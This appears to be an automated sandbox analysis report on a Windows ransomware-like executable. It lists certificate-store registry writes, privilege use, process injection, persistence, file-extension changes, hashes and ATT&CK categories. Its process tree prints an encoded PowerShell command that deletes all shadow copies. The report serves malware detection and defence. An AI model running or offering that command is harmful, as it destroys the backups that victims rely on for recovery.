762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986ecb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986ecb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986ecb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986ecb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
  • Suspicious behavior: EnumeratesProcesses
    cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exepowershell.exe

    Reported IOCs

    pidprocess
    1988cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    1988cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    2856powershell.exe
    2856powershell.exe
    2856powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exepowershell.exevssvc.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege1988cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    Token: SeDebugPrivilege2856powershell.exe
    Token: SeBackupPrivilege892vssvc.exe
    Token: SeRestorePrivilege892vssvc.exe
    Token: SeAuditPrivilege892vssvc.exe
  • Suspicious use of WriteProcessMemory
    cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 668 wrote to memory of 1988668cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    PID 668 wrote to memory of 1988668cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    PID 668 wrote to memory of 1988668cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.execb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    PID 1988 wrote to memory of 28561988cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exepowershell.exe
    PID 1988 wrote to memory of 28561988cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exepowershell.exe
Processes 5
  • C:\Users\Admin\AppData\Local\Temp\cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
    "C:\Users\Admin\AppData\Local\Temp\cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe"
    Modifies system executable filetype association
    Drops file in Program Files directory
    Drops file in Windows directory
    Modifies registry class
    Suspicious use of WriteProcessMemory
    PID:668
    • C:\Users\Admin\AppData\Local\Temp\3582-490\cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe
      "C:\Users\Admin\AppData\Local\Temp\3582-490\cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe"
      Executes dropped EXE
      Modifies extensions of user files
      Adds Run key to start application
      Enumerates connected drives
      Sets desktop wallpaper using registry
      Drops file in Program Files directory
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1988
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        PID:2856
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    PID:1740
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    Suspicious use of AdjustPrivilegeToken
    PID:892
Network
MITRE ATT&CK Matrix
Collection
Command and Control
    Credential Access
    Defense Evasion
    Discovery
    Execution
      Exfiltration
        Impact
        Initial Access
          Lateral Movement
            Persistence
            Privilege Escalation
              Replay Monitor
              00:00 00:00
              Downloads

              • C:\Users\Admin\AppData\Local\Temp\3582-490\cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe

                MD5

                9efbbace685671cc174a24989e4dda08

                SHA1

                9234b5bd774ca12b0fe46ce74c80f1ea76d85600

                SHA256

                65980c4eba464e9bdaa06ac6bad34b90405c591769accb078ac352288be9def5

                SHA512

                a2af96b0e6557c1f4bb4900f5abb0d39594847521156d37c33c7f3c744475bf8e91a8f14e0910e6c4f192da9aa25e40acd691b7efe841adcf95ac8670b140133

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\3582-490\cb6db23d41d26f985ac7316fe5747ede297ed0b3ab9f71c76a84c598d00accde.exe

                MD5

                9efbbace685671cc174a24989e4dda08

                SHA1

                9234b5bd774ca12b0fe46ce74c80f1ea76d85600

                SHA256

                65980c4eba464e9bdaa06ac6bad34b90405c591769accb078ac352288be9def5

                SHA512

                a2af96b0e6557c1f4bb4900f5abb0d39594847521156d37c33c7f3c744475bf8e91a8f14e0910e6c4f192da9aa25e40acd691b7efe841adcf95ac8670b140133

                Download Submit

              • memory/2856-124-0x0000020AF1C00000-0x0000020AF1C22000-memory.dmp

                Download

              • memory/2856-128-0x0000020AF1ED0000-0x0000020AF1F46000-memory.dmp

                Download

              • memory/2856-135-0x0000020AD9B60000-0x0000020AF1C50000-memory.dmp

                Download

              • memory/2856-140-0x0000020AD9B60000-0x0000020AF1C50000-memory.dmp

                Download

              • memory/2856-142-0x0000020AD9B60000-0x0000020AF1C50000-memory.dmp

                Download